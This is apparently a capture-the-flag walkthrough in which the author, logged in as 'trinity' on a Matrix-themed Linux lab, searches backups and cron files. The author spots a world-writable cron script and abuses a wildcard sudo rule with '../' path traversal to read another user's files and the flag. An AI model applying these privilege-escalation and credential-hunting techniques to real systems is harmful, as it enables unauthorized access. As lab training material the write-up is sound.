Start Page Alright so we login as trinity, honestly I'm not sure why I didn't login to trinities account as soon as I got the flag... anyway.

$ ls -al
total 24
dr-xr-x--- 2 trinity neo  4096 Oct 17  2018 .
drwxr-xr-x 8 root    root 4096 May 30  2018 ..
lrwxrwxrwx 1 trinity neo     9 Jun  3  2018 .bash_history -> /dev/null
-r-xr-x--- 1 trinity neo   252 May 30  2018 .bash_logout
-r-xr-x--- 1 trinity neo  2632 May 30  2018 .bashrc
lrwxrwxrwx 1 root    root    9 Oct 17  2018 .mysql_history -> /dev/null
-r-xr-x--- 1 trinity neo   124 Aug 23  2018 phonebook
-r-xr-x--- 1 trinity neo   674 May 30  2018 .profile

phonebook is different

$ cat phonebook
The Oracle        1800-133-7133
Persephone        345-555-1244
copy made by Cypher copy utility on /home/neo/phonebook

Huh, interesting... thinking back now perhaps there's something useful in /backups? Perhaps neo is dumb enough to slap his password there somewhere.

$ cd /backup && grep -r "neo" 2>/dev/null

Nope... Hmm. What about Cypher?

$ cd /backup && grep -r "cypher" 2>/dev/null
Binary file 3dab3277410dddca016834f91d172027 matches
Binary file ca584b15ae397a9ad45b1ff267b55796 matches
Binary file 776d27d2a429e63bbc3cb29183417bb2 matches
$ cat 3dab3277410dddca016834f91d172027
var/log/syslog0000640000000000000040000011046412310211475012150 0ustar  rootadmMar 12 06:26:13 forensics rsyslogd: [origin software="rsyslogd" swVersion="5.8.11" x-pid="2019" x-info="http://www.rsyslog.com"] rsyslogd was HUPed
Mar 12 06:30:56 forensics mpt-statusd: detected non-optimal RAID status
Mar 12 06:39:01 forensics /USR/SBIN/CRON[26068]: (root) CMD (  [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -ignore_readdir_race -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete)
Mar 12 21:43:44 forensics mpt-statusd: detected non-optimal RAID status
Mar 12 21:46:28 forensics ntpd_intres[3227]: host name not found: 0.debian.pool.ntp.org
Mar 12 21:46:48 forensics ntpd_intres[3227]: host name not found: 1.debian.pool.ntp.org
Mar 12 21:47:08 forensics ntpd_intres[3227]: host name not found: 2.debian.pool.ntp.org
Mar 12 21:47:28 forensics ntpd_intres[3227]: host name not found: 3.debian.pool.ntp.org
Mar 12 21:53:44 forensics mpt-statusd: detected non-optimal RAID status
Mar 12 22:01:58 forensics crontab[1662]: (cypher) BEGIN EDIT (cypher)
Mar 12 22:02:27 forensics crontab[1662]: (cypher) REPLACE (cypher)
Mar 12 22:02:27 forensics crontab[1662]: (cypher) END EDIT (cypher)
Mar 12 22:03:01 forensics /USR/SBIN/CRON[1682]: (cypher) CMD (python /tmp/Gathering.py)
Mar 12 22:03:44 forensics mpt-statusd: detected non-optimal RAID status
Mar 12 22:03:58 forensics ntpd_intres[3227]: host name not found: 0.debian.pool.ntp.org
Mar 12 22:04:18 forensics ntpd_intres[3227]: host name not found: 1.debian.pool.ntp.org
Mar 12 22:04:38 forensics ntpd_intres[3227]: host name not found: 2.debian.pool.ntp.org
Mar 12 22:04:58 forensics ntpd_intres[3227]: host name not found: 3.debian.pool.ntp.org
Mar 12 22:06:01 forensics /USR/SBIN/CRON[1857]: (cypher) CMD (python /tmp/Gathering.py)
Mar 12 22:09:01 forensics /USR/SBIN/CRON[2269]: (cypher) CMD (python /tmp/Gathering.py)
Mar 12 22:09:01 forensics /USR/SBIN/CRON[2270]: (root) CMD (  [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -ignore_readdir_race -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete)

There's three more files to check out, but I want to know if I can read that python script:

$ cat /tmp/Gathering.py
import os
os.system('ps aux > /tmp/28JNvE05KBltE8S7o2xu')

Interesting... looks like it's running as Cypher too. Can we write to this file?

$ ls -al /tmp/Gathering.py
-rwxrwxrwx 1 cypher cypher 58 Jul 14 00:24 /tmp/Gathering.py

We can! Wait, I just got off track? I'm supposed to be looking for neos password... well let's pocket this little piece of info.
Okay, back to those backup files:

$ cat 776d27d2a429e63bbc3cb29183417bb2
tmp/0001773000000000000000000000000012310212034010341 5ustar  rootroottmp/Gathering.py0000777000175400017540000000006612310211034013512 0ustar  cyphercypherimport os
os.system("ps aux > /home/cypher/info.txt")

Interesting again, cypher should be easy... perhaps we can pivot from there? We'll see...

$ cat ca584b15ae397a9ad45b1ff267b55796
var/spool/cron/0000755000000000000000000000000012303165400012433 5ustar  rootrootvar/spool/cron/atspool/0001770000000100000010000000000011764633605014675 5ustar  daemondaemonvar/spool/cron/crontabs/0001730000000000001460000000000012310210663014720 5ustar  rootcrontabvar/spool/cron/crontabs/cypher0000600000175400001460000000214612310210663016466 0ustar  cyphercrontab# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.f7mcQy/crontab installed on Wed Mar 12 22:02:27 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/3 * * * * python /tmp/Gathering.py
var/spool/cron/atjobs/0001770000000100000010000000000012303165436014466 5ustar  daemondaemonvar/spool/cron/atjobs/.SEQ0000600000000100000010000000000212303165436015101 0ustar  daemondaemon0

Okay, yeah anyway, let's have another look around for something about neo.

$ cd / && grep -r "neo" 2>/dev/null | head -n 10
etc/modprobe.d/blacklist-framebuffer.conf:blacklist neofb
etc/modprobe.d/fbdev-blacklist.conf:blacklist neofb
etc/group:challenger:x:1000:morpheus,trinity,architect,oracle,neo,cypher
etc/group:trinity:x:1002:neo
etc/group:neo:x:1005:
etc/passwd:neo:x:1004:1005::/home/neo:/bin/bash
etc/subgid:neo:362144:65536
etc/subuid:neo:362144:65536
etc/init.d/bootmisc.sh:# Short-Description: Miscellaneous things to be done during bootup.
Binary file var/log/wtmp.1 matches
$ cat var/log/wtmp.1
... binary junk with some access logs of each user  and their ips ...
$ cd /var/log && grep -r "neo" 2>/dev/null | head -n 10
Binary file wtmp.1 matches
Binary file wtmp matches

Dry. Okay, let's try a different path here. Can we run anything as root?

$ sudo -l
[sudo] password for trinity:
Matching Defaults entries for trinity on lxc-sysadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User trinity may run the following commands on lxc-sysadmin:
    (neo) /bin/cat /home/trinity/*

Oh look, we can run cat as neo at a wildcard path!!

$ cd ~ && ls -al
$ cd ~ && ls -al
total 24
dr-xr-x--- 2 trinity neo  4096 Oct 17  2018 .
drwxr-xr-x 8 root    root 4096 May 30  2018 ..
lrwxrwxrwx 1 trinity neo     9 Jun  3  2018 .bash_history -> /dev/null
-r-xr-x--- 1 trinity neo   252 May 30  2018 .bash_logout
-r-xr-x--- 1 trinity neo  2632 May 30  2018 .bashrc
lrwxrwxrwx 1 root    root    9 Oct 17  2018 .mysql_history -> /dev/null
-r-xr-x--- 1 trinity neo   124 Aug 23  2018 phonebook
-r-xr-x--- 1 trinity neo   674 May 30  2018 .profile
$ sudo -u neo cat .profile
Sorry, user trinity is not allowed to execute '/bin/cat .profile' as neo on lxc-sysadmin.
$ sudo -u neo cat /home/trinity/.profile
... works ...
$ sudo -u neo cat /home/trinity/../neo/.profile
... works ...
$ sudo -u neo cat /home/trinity/../neo/flag.txt
cat: /home/trinity/../neo/flag.txt: No such file or directory
$ sudo -u neo cat /home/trinity/../neo/Cypher
cat: /home/trinity/../neo/Cypher: No such file or directory
$ sudo -u neo cat /home/trinity/../neo/phonebook
$ sudo -u neo cat /home/trinity/../neo/phonebook
The Oracle        1800-133-7133
Persephone        345-555-1244
change my current password FLAG-XXX
don't forget to remove this :)

Nice! That one was fun!